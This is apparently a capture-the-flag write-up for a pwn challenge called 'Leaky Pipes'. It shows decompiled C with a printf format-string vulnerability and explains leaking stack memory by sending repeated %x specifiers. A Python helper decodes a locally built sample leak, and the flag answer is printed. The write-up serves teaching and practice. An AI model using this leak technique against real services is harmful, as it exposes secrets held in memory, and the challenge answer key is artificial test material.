Leaky Pipes [Pwn]

The challenge provided us with an nc connection to the server hosting the binary, and the binary itself. So, without launching Ghidra or IDA, we can use the following tool to disassemble the binary.
The decompiled output is as follows:
int __cdecl readflag(char *s, int n)
{
    FILE *stream; // [esp+Ch] [ebp-Ch]

    stream = fopen("./flag.txt", "r");
    if ( !stream )
    {
        printf("%s %s\n", "Please create 'flag.txt' in this directory with your", "own debugging flag.");
        exit(0);
    }
    fgets(s, n, stream);
    return fclose(stream);
}

//----- (08049361) --------------------------------------------------------
int vuln()
{
    char format[128]; // [esp+0h] [ebp-C8h] BYREF
    char s[68]; // [esp+80h] [ebp-48h] BYREF

    readflag(s, 64);
    printf("Tell me your secret so I can reveal mine ;) >> ");
    __isoc99_scanf("%127s", format);
    puts("Here's your secret.. I ain't telling mine :p");
    printf(format);
    return putchar(10);
}
// 80491A0: using guessed type int __cdecl __isoc99_scanf(_DWORD, _DWORD);
// 8049361: using guessed type char s[68];

//----- (080493ED) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
    __gid_t v4; // [esp+0h] [ebp-Ch]

    setvbuf(stdout, 0, 2, 0);
    v4 = getegid();
    setresgid(v4, v4, v4);
    vuln();
    return 0;
}
The vulnerability in the binary is the uncontrolled format string: user input is passed straight to printf as the format argument (printf(format)). The complete details on this class of vulnerability can be found on my old blog here:

With that explanation, no script is needed here. By connecting to the instance given to us, we can just send 100 %x's and expect the binary to leak information from the stack.

Now, all we need to do is swap the endianness of each leaked word and convert the output from hex to ASCII. However, no flag appeared. So, referring to my old blog post, there may be some "bad bytes".

By removing some of the characters from the start of the hex output, we finally got the flag!
flag: OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l}
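As an added example (the writeup itself used no script), the post-processing step in Python: split the leaked words, restore the leading zeros that bare %x drops, reverse each dword for little-endian x86, and search the decoded bytes for the flag prefix instead of decoding from the start of the dump, where the "bad bytes" from other stack words live. It assumes the format string was sent as repeated `%x.` so that words are separated, and the sample leak is constructed inline from the flag rather than captured from the server.

```python
import re
import struct

# Flag as given in the writeup; fgets() keeps the trailing newline, so the
# bytes sitting in s[] on the stack include it.
FLAG = b"OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l}\n"


def build_sample_leak(secret):
    """Constructed stand-in for the server's reply to repeated '%x.'.

    The first three words imitate unrelated stack contents (including the
    format buffer itself, which holds the bytes "%x%x" = 0x78257825);
    the rest are the secret buffer read as little-endian dwords.
    """
    padded = secret.ljust((len(secret) + 3) // 4 * 4, b"\x00")
    words = [0x80, 0xF7FB9D80, 0x78257825]
    words += [struct.unpack("<I", padded[i:i + 4])[0]
              for i in range(0, len(padded), 4)]
    return ".".join("%x" % w for w in words) + "."


def decode_leak(leak):
    """Turn dot-separated %x output back into the raw stack bytes."""
    out = bytearray()
    for tok in re.findall(r"[0-9a-fA-F]+", leak):
        if len(tok) > 8:
            # Bare '%x' with no separator runs words together and cannot be
            # split reliably; send '%x.' or '%08x' instead.
            raise ValueError("word longer than 32 bits: %r" % tok)
        # int() restores the leading zeros that %x dropped, and '<I' packs
        # the dword back in x86 little-endian order (bytes reversed).
        out += struct.pack("<I", int(tok, 16))
    return bytes(out)


def find_flag(data, prefix=b"OSCTF{"):
    """Scan for the flag rather than trusting the start of the dump."""
    m = re.search(re.escape(prefix) + rb"[^}]*\}", data)
    return m.group(0) if m else None


if __name__ == "__main__":
    leak = build_sample_leak(FLAG)
    print(leak)
    print(find_flag(decode_leak(leak)))
```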